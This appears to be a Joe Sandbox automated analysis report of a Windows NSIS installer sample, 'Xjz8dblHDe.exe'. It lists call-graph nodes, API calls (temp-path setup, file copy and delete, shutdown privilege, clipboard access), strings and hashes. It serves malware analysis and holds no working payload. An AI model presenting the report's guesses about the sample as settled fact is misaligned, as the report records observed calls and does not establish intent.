3346->3347 3348 40673c 3347->3348 3349 40674e GetExitCodeProcess 3348->3349 3353 4066ad 3348->3353 3349->3338 3352->3343 3354 4066ca PeekMessageW 3353->3354 3355 4066c0 DispatchMessageW 3354->3355 3356 4066da WaitForSingleObject 3354->3356 3355->3354 3356->3348 3624 40230c 3625 402314 3624->3625 3626 40231a 3624->3626 3628 402c41 17 API calls 3625->3628 3627 402328 3626->3627 3629 402c41 17 API calls 3626->3629 3630 402336 3627->3630 3631 402c41 17 API calls 3627->3631 3628->3626 3629->3627 3632 402c41 17 API calls 3630->3632 3631->3630 3633 40233f WritePrivateProfileStringW 3632->3633 4381 40190c 4382 401943 4381->4382 4383 402c41 17 API calls 4382->4383 4384 401948 4383->4384 4385 4059a9 67 API calls 4384->4385 4386 401951 4385->4386 3634 40238e 3635 4023c1 3634->3635 3636 402396 3634->3636 3638 402c41 17 API calls 3635->3638 3637 402c81 17 API calls 3636->3637 3639 40239d 3637->3639 3640 4023c8 3638->3640 3641 4023a7 3639->3641 3644 4023d5 3639->3644 3646 402cff 3640->3646 3643 402c41 17 API calls 3641->3643 3645 4023ae RegDeleteValueW RegCloseKey 3643->3645 3645->3644 3647 402d0c 3646->3647 3648 402d13 3646->3648 3647->3644 3648->3647 3650 402d44 3648->3650 3651 406104 RegOpenKeyExW 3650->3651 3652 402d72 3651->3652 3653 402dec 3652->3653 3655 402d76 3652->3655 3653->3647 3654 402d98 RegEnumKeyW 3654->3655 3656 402daf RegCloseKey 3654->3656 3655->3654 3655->3656 3658 402dd0 RegCloseKey 3655->3658 3660 402d44 6 API calls 3655->3660 3657 406671 5 API calls 3656->3657 3659 402dbf 3657->3659 3658->3653 3661 402de0 RegDeleteKeyW 3659->3661 3662 402dc3 3659->3662 3660->3655 3661->3653 3662->3653 4387 40190f 4388 402c41 17 API calls 4387->4388 4389 401916 4388->4389 4390 4058fd MessageBoxIndirectW 4389->4390 4391 40191f 4390->4391 4392 401491 4393 4052ff 24 API calls 4392->4393 4394 401498 4393->4394 4395 401d14 4396 402c1f 17 API calls 4395->4396 4397 401d1b 4396->4397 4398 402c1f 17 API calls 4397->4398 4399 401d27 GetDlgItem 4398->4399 4400 402592 4399->4400 4401 402598 4402 4025c7 4401->4402 4403 4025ac 4401->4403 4405 4025fb 4402->4405 4406 4025cc 4402->4406 4404 402c1f 17 API calls 4403->4404 4413 4025b3 4404->4413 4408 402c41 17 API calls 4405->4408 4407 402c41 17 API calls 4406->4407 4409 4025d3 WideCharToMultiByte lstrlenA 4407->4409 4410 402602 lstrlenW 4408->4410 4409->4413 4410->4413 4411 40262f 4412 402645 4411->4412 4414 405e3f WriteFile 4411->4414 4413->4411 4413->4412 4415 405e6e 5 API calls 4413->4415 4414->4412 4415->4411 4416 40149e 4417 4022f7 4416->4417 4418 4014ac PostQuitMessage 4416->4418 4418->4417 4419 401c1f 4420 402c1f 17 API calls 4419->4420 4421 401c26 4420->4421 4422 402c1f 17 API calls 4421->4422 4423 401c33 4422->4423 4424 402c41 17 API calls 4423->4424 4426 401c48 4423->4426 4424->4426 4425 401c58 4428 401c63 4425->4428 4429 401caf 4425->4429 4426->4425 4427 402c41 17 API calls 4426->4427 4427->4425 4430 402c1f 17 API calls 4428->4430 4431 402c41 17 API calls 4429->4431 4433 401c68 4430->4433 4432 401cb4 4431->4432 4434 402c41 17 API calls 4432->4434 4435 402c1f 17 API calls 4433->4435 4436 401cbd FindWindowExW 4434->4436 4437 401c74 4435->4437 4440 401cdf 4436->4440 4438 401c81 SendMessageTimeoutW 4437->4438 4439 401c9f SendMessageW 4437->4439 4438->4440 4439->4440 4441 402aa0 SendMessageW 4442 402ac5 4441->4442 4443 402aba InvalidateRect 4441->4443 4443->4442 4444 402821 4445 402827 4444->4445 4446 402ac5 4445->4446 4447 40282f FindClose 4445->4447 4447->4446 3256 4015a3 3257 402c41 17 API calls 3256->3257 3258 4015aa SetFileAttributesW 3257->3258 3259 4015bc 3258->3259 4448 4029a8 4449 402c1f 17 API calls 4448->4449 4450 4029ae 4449->4450 4451 4029d5 4450->4451 4452 4029ee 4450->4452 4459 40288b 4450->4459 4453 4029da 4451->4453 4454 4029eb 4451->4454 4455 402a08 4452->4455 4456 4029f8 4452->4456 4462 406297 lstrcpynW 4453->4462 4454->4459 4463 4061de wsprintfW 4454->4463 4458 4062b9 17 API calls 4455->4458 4457 402c1f 17 API calls 4456->4457 4457->4454 4458->4454 4462->4459 4463->4459 4464 4028ad 4465 402c41 17 API calls 4464->4465 4467 4028bb 4465->4467 4466 4028d1 4469 405d68 2 API calls 4466->4469 4467->4466 4468 402c41 17 API calls 4467->4468 4468->4466 4470 4028d7 4469->4470 4492 405d8d GetFileAttributesW CreateFileW 4470->4492 4472 4028e4 4473 4028f0 GlobalAlloc 4472->4473 4474 402987 4472->4474 4475 402909 4473->4475 4476 40297e CloseHandle 4473->4476 4477 4029a2 4474->4477 4478 40298f DeleteFileW 4474->4478 4493 403324 SetFilePointer 4475->4493 4476->4474 4478->4477 4480 40290f 4481 40330e ReadFile 4480->4481 4482 402918 GlobalAlloc 4481->4482 4483 402928 4482->4483 4484 40295c 4482->4484 4486 403116 31 API calls 4483->4486 4485 405e3f WriteFile 4484->4485 4487 402968 GlobalFree 4485->4487 4491 402935 4486->4491 4488 403116 31 API calls 4487->4488 4490 40297b 4488->4490 4489 402953 GlobalFree 4489->4484 4490->4476 4491->4489 4492->4472 4493->4480 4494 401a30 4495 402c41 17 API calls 4494->4495 4496 401a39 ExpandEnvironmentStringsW 4495->4496 4497 401a4d 4496->4497 4499 401a60 4496->4499 4498 401a52 lstrcmpW 4497->4498 4497->4499 4498->4499 3704 402032 3705 402044 3704->3705 3706 4020f6 3704->3706 3707 402c41 17 API calls 3705->3707 3708 401423 24 API calls 3706->3708 3709 40204b 3707->3709 3715 402250 3708->3715 3710 402c41 17 API calls 3709->3710 3711 402054 3710->3711 3712 40206a LoadLibraryExW 3711->3712 3713 40205c GetModuleHandleW 3711->3713 3712->3706 3714 40207b 3712->3714 3713->3712 3713->3714 3724 4066e0 WideCharToMultiByte 3714->3724 3718 4020c5 3720 40209c 3718->3720 3721 4052ff 24 API calls 3718->3721 3719 40208c 3719->3720 3722 401423 24 API calls 3719->3722 3720->3715 3723 4020e8 FreeLibrary 3720->3723 3721->3720 3722->3720 3723->3715 3725 40670a GetProcAddress 3724->3725 3726 402086 3724->3726 3725->3726 3726->3718 3726->3719 3732 403d35 3733 403e88 3732->3733 3734 403d4d 3732->3734 3736 403ed9 3733->3736 3737 403e99 GetDlgItem GetDlgItem 3733->3737 3734->3733 3735 403d59 3734->3735 3738 403d64 SetWindowPos 3735->3738 3739 403d77 3735->3739 3741 403f33 3736->3741 3746 401389 2 API calls 3736->3746 3740 40420e 18 API calls 3737->3740 3738->3739 3743 403d94 3739->3743 3744 403d7c ShowWindow 3739->3744 3745 403ec3 SetClassLongW 3740->3745 3742 40425a SendMessageW 3741->3742 3762 403e83 3741->3762 3771 403f45 3742->3771 3747 403db6 3743->3747 3748 403d9c DestroyWindow 3743->3748 3744->3743 3749 40140b 2 API calls 3745->3749 3750 403f0b 3746->3750 3751 403dbb SetWindowLongW 3747->3751 3752 403dcc 3747->3752 3802 404197 3748->3802 3749->3736 3750->3741 3753 403f0f SendMessageW 3750->3753 3751->3762 3756 403e75 3752->3756 3757 403dd8 GetDlgItem 3752->3757 3753->3762 3754 40140b 2 API calls 3754->3771 3755 404199 DestroyWindow EndDialog 3755->3802 3812 404275 3756->3812 3758 403e08 3757->3758 3759 403deb SendMessageW IsWindowEnabled 3757->3759 3764 403e15 3758->3764 3765 403e5c SendMessageW 3758->3765 3766 403e28 3758->3766 3776 403e0d 3758->3776 3759->3758 3759->3762 3761 4041c8 ShowWindow 3761->3762 3763 4062b9 17 API calls 3763->3771 3764->3765 3764->3776 3765->3756 3768 403e30 3766->3768 3769 403e45 3766->3769 3774 40140b 2 API calls 3768->3774 3772 40140b 2 API calls 3769->3772 3770 403e43 3770->3756 3771->3754 3771->3755 3771->3762 3771->3763 3773 40420e 18 API calls 3771->3773 3793 4040d9 DestroyWindow 3771->3793 3803 40420e 3771->3803 3775 403e4c 3772->3775 3773->3771 3774->3776 3775->3756 3775->3776 3809 4041e7 3776->3809 3778 403fc0 GetDlgItem 3779 403fd5 3778->3779 3780 403fdd ShowWindow KiUserCallbackDispatcher 3778->3780 3779->3780 3806 404230 KiUserCallbackDispatcher 3780->3806 3782 404007 EnableWindow 3787 40401b 3782->3787 3783 404020 GetSystemMenu EnableMenuItem SendMessageW 3784 404050 SendMessageW 3783->3784 3783->3787 3784->3787 3786 403d16 18 API calls 3786->3787 3787->3783 3787->3786 3807 404243 SendMessageW 3787->3807 3808 406297 lstrcpynW 3787->3808 3789 40407f lstrlenW 3790 4062b9 17 API calls 3789->3790 3791 404095 SetWindowTextW 3790->3791 3792 401389 2 API calls 3791->3792 3792->3771 3794 4040f3 CreateDialogParamW 3793->3794 3793->3802 3795 404126 3794->3795 3794->3802 3796 40420e 18 API calls 3795->3796 3797 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3796->3797 3798 401389 2 API calls 3797->3798 3799 404177 3798->3799 3799->3762 3800 40417f ShowWindow 3799->3800 3801 40425a SendMessageW 3800->3801 3801->3802 3802->3761 3802->3762 3804 4062b9 17 API calls 3803->3804 3805 404219 SetDlgItemTextW 3804->3805 3805->3778 3806->3782 3807->3787 3808->3789 3810 4041f4 SendMessageW 3809->3810 3811 4041ee 3809->3811 3810->3770 3811->3810 3813 404338 3812->3813 3814 40428d GetWindowLongW 3812->3814 3813->3762 3814->3813 3815 4042a2 3814->3815 3815->3813 3816 4042d2 3815->3816 3817 4042cf GetSysColor 3815->3817 3818 4042e2 SetBkMode 3816->3818 3819 4042d8 SetTextColor 3816->3819 3817->3816 3820 404300 3818->3820 3821 4042fa GetSysColor 3818->3821 3819->3818 3822 404307 SetBkColor 3820->3822 3823 404311 3820->3823 3821->3820 3822->3823 3823->3813 3824 404324 DeleteObject 3823->3824 3825 40432b CreateBrushIndirect 3823->3825 3824->3825 3825->3813 4505 401735 4506 402c41 17 API calls 4505->4506 4507 40173c SearchPathW 4506->4507 4508 401757 4507->4508 4509 402a35 4510 402c1f 17 API calls 4509->4510 4511 402a3b 4510->4511 4512 402a72 4511->4512 4513 40288b 4511->4513 4515 402a4d 4511->4515 4512->4513 4514 4062b9 17 API calls 4512->4514 4514->4513 4515->4513 4517 4061de wsprintfW 4515->4517 4517->4513 4518 4014b8 4519 4014be 4518->4519 4520 401389 2 API calls 4519->4520 4521 4014c6 4520->4521 4522 4046b8 4523 4046c8 4522->4523 4524 4046ee 4522->4524 4525 40420e 18 API calls 4523->4525 4526 404275 8 API calls 4524->4526 4527 4046d5 SetDlgItemTextW 4525->4527 4528 4046fa 4526->4528 4527->4524 4529 401db9 GetDC 4530 402c1f 17 API calls 4529->4530 4531 401dcb GetDeviceCaps MulDiv ReleaseDC 4530->4531 4532 402c1f 17 API calls 4531->4532 4533 401dfc 4532->4533 4534 4062b9 17 API calls 4533->4534 4535 401e39 CreateFontIndirectW 4534->4535 4536 402592 4535->4536 4537 40283b 4538 402843 4537->4538 4539 402847 FindNextFileW 4538->4539 4541 402859 4538->4541 4540 4028a0 4539->4540 4539->4541 4543 406297 lstrcpynW 4540->4543 4543->4541 3858 40543e 3859 4055e8 3858->3859 3860 40545f GetDlgItem GetDlgItem GetDlgItem 3858->3860 3862 4055f1 GetDlgItem CreateThread CloseHandle 3859->3862 3863 405619 3859->3863 3903 404243 SendMessageW 3860->3903 3862->3863 3906 4053d2 5 API calls 3862->3906 3865 405644 3863->3865 3867 405630 ShowWindow ShowWindow 3863->3867 3868 405669 3863->3868 3864 4054cf 3873 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3864->3873 3866 4056a4 3865->3866 3870 405658 3865->3870 3871 40567e ShowWindow 3865->3871 3866->3868 3880 4056b2 SendMessageW 3866->3880 3905 404243 SendMessageW 3867->3905 3872 404275 8 API calls 3868->3872 3874 4041e7 SendMessageW 3870->3874 3876 405690 3871->3876 3877 40569e 3871->3877 3875 405677 3872->3875 3878 405544 3873->3878 3879 405528 SendMessageW SendMessageW 3873->3879 3874->3868 3884 4052ff 24 API calls 3876->3884 3885 4041e7 SendMessageW 3877->3885 3881 405557 3878->3881 3882 405549 SendMessageW 3878->3882 3879->3878 3880->3875 3883 4056cb CreatePopupMenu 3880->3883 3887 40420e 18 API calls 3881->3887 3882->3881 3886 4062b9 17 API calls 3883->3886 3884->3877 3885->3866 3888 4056db AppendMenuW 3886->3888 3889 405567 3887->3889 3890 4056f8 GetWindowRect 3888->3890 3891 40570b TrackPopupMenu 3888->3891 3892 405570 ShowWindow 3889->3892 3893 4055a4 GetDlgItem SendMessageW 3889->3893 3890->3891 3891->3875 3894 405726 3891->3894 3895 405593 3892->3895 3896 405586 ShowWindow 3892->3896 3893->3875 3897 4055cb SendMessageW SendMessageW 3893->3897 3898 405742 SendMessageW 3894->3898 3904 404243 SendMessageW 3895->3904 3896->3895 3897->3875 3898->3898 3899 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3898->3899 3901 405784 SendMessageW 3899->3901 3901->3901 3902 4057ad GlobalUnlock SetClipboardData CloseClipboard 3901->3902 3902->3875 3903->3864 3904->3893 3905->3865

                                                                    Executed Functions

                                                                    Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 30 403495-40349a 28->30 31 40349c-4034a0 28->31 38 403610-40362a DeleteFileW call 402edd 29->38 39 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->39 30->30 30->31 33 4034a2-4034a6 31->33 34 4034a7-4034ab 31->34 33->34 36 4034b1-4034b7 34->36 37 40356a-403577 call 405b99 34->37 43 4034d2-40350b 36->43 44 4034b9-4034c1 36->44 54 403579-40357a 37->54 55 40357b-403581 37->55 56 403630-403636 38->56 57 4036db-4036eb call 4038ad OleUninitialize 38->57 39->38 52 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 39->52 50 403528-403562 43->50 51 40350d-403512 43->51 48 4034c3-4034c6 44->48 49 4034c8 44->49 48->43 48->49 49->43 50->37 53 403564-403568 50->53 51->50 58 403514-40351c 51->58 52->38 52->57 53->37 60 403589-403597 call 406297 53->60 54->55 55->28 61 403587 55->61 62 4036cb-4036d2 call 403987 56->62 63 40363c-403647 call 405b99 56->63 73 403811-403817 57->73 74 4036f1-403701 call 4058fd ExitProcess 57->74 65 403523 58->65 66 40351e-403521 58->66 68 40359c 60->68 61->68 76 4036d7 62->76 80 403695-40369f 63->80 81 403649-40367e 63->81 65->50 66->50 66->65 68->29 78 403895-40389d 73->78 79 403819-40382f GetCurrentProcess OpenProcessToken 73->79 76->57 82 4038a3-4038a7 ExitProcess 78->82 83 40389f 78->83 87 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403865-403873 call 406671 79->88 85 4036a1-4036af call 405c74 80->85 86 403707-40371b call 405868 lstrcatW 80->86 89 403680-403684 81->89 83->82 85->57 99 4036b1-4036c7 call 406297 * 2 85->99 100 403728-403742 lstrcatW lstrcmpiW 86->100 101 40371d-403723 lstrcatW 86->101 87->88 102 403881-40388c ExitWindowsEx 88->102 103 403875-40387f 88->103 93 403686-40368b 89->93 94 40368d-403691 89->94 93->94 95 403693 93->95 94->89 94->95 95->80 99->62 100->57 105 403744-403747 100->105 101->100 102->78 106 40388e-403890 call 40140b 102->106 103->102 103->106 108 403750 call 40584b 105->108 109 403749-40374e call 4057ce 105->109 106->78 117 403755-403763 SetCurrentDirectoryW 108->117 109->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 128 403805-40380c call 40605d 126->128 127->126 129 4037ce-4037ee call 40605d call 4062b9 call 405880 127->129 128->57 129->126 138 4037f0-4037f7 CloseHandle 129->138 138->126
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 0040338F
                                                                    • GetVersion.KERNEL32 ref: 00403395
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                    • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                    • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                    • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000020,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                      • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                      • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                    • ExitProcess.KERNEL32 ref: 00403701
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Xjz8dblHDe.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                    • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Xjz8dblHDe.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                    • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                    • ExitProcess.KERNEL32 ref: 004038A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\Xjz8dblHDe.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186$C:\Users\user\Desktop$C:\Users\user\Desktop\Xjz8dblHDe.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 3441113951-1016757358
                                                                    • Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                    • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                    • Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                    • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E
                                                                    Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 139 40543e-405459 140 4055e8-4055ef 139->140 141 40545f-405526 GetDlgItem * 3 call 404243 call 404b9c GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 4055f1-405613 GetDlgItem CreateThread CloseHandle 140->143 144 405619-405626 140->144 163 405544-405547 141->163 164 405528-405542 SendMessageW * 2 141->164 143->144 146 405644-40564e 144->146 147 405628-40562e 144->147 148 405650-405656 146->148 149 4056a4-4056a8 146->149 151 405630-40563f ShowWindow * 2 call 404243 147->151 152 405669-405672 call 404275 147->152 154 405658-405664 call 4041e7 148->154 155 40567e-40568e ShowWindow 148->155 149->152 158 4056aa-4056b0 149->158 151->146 160 405677-40567b 152->160 154->152 161 405690-405699 call 4052ff 155->161 162 40569e-40569f call 4041e7 155->162 158->152 165 4056b2-4056c5 SendMessageW 158->165 161->162 162->149 166 405557-40556e call 40420e 163->166 167 405549-405555 SendMessageW 163->167 164->163 168 4057c7-4057c9 165->168 169 4056cb-4056f6 CreatePopupMenu call 4062b9 AppendMenuW 165->169 178 405570-405584 ShowWindow 166->178 179 4055a4-4055c5 GetDlgItem SendMessageW 166->179 167->166 168->160 176 4056f8-405708 GetWindowRect 169->176 177 40570b-405720 TrackPopupMenu 169->177 176->177 177->168 180 405726-40573d 177->180 181 405593 178->181 182 405586-405591 ShowWindow 178->182 179->168 183 4055cb-4055e3 SendMessageW * 2 179->183 184 405742-40575d SendMessageW 180->184 185 405599-40559f call 404243 181->185 182->185 183->168 184->184 186 40575f-405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405784-4057ab SendMessageW 186->188 188->188 189 4057ad-4057c1 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                    • GetClientRect.USER32(?,?), ref: 004054E8
                                                                    • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                      • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00405613
                                                                    • ShowWindow.USER32(00000000), ref: 00405637
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                    • ShowWindow.USER32(00000008), ref: 00405686
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                    • CreatePopupMenu.USER32 ref: 004056CB
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                    • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                    • OpenClipboard.USER32(00000000), ref: 00405760
                                                                    • EmptyClipboard.USER32 ref: 00405766
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                    • CloseClipboard.USER32 ref: 004057C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
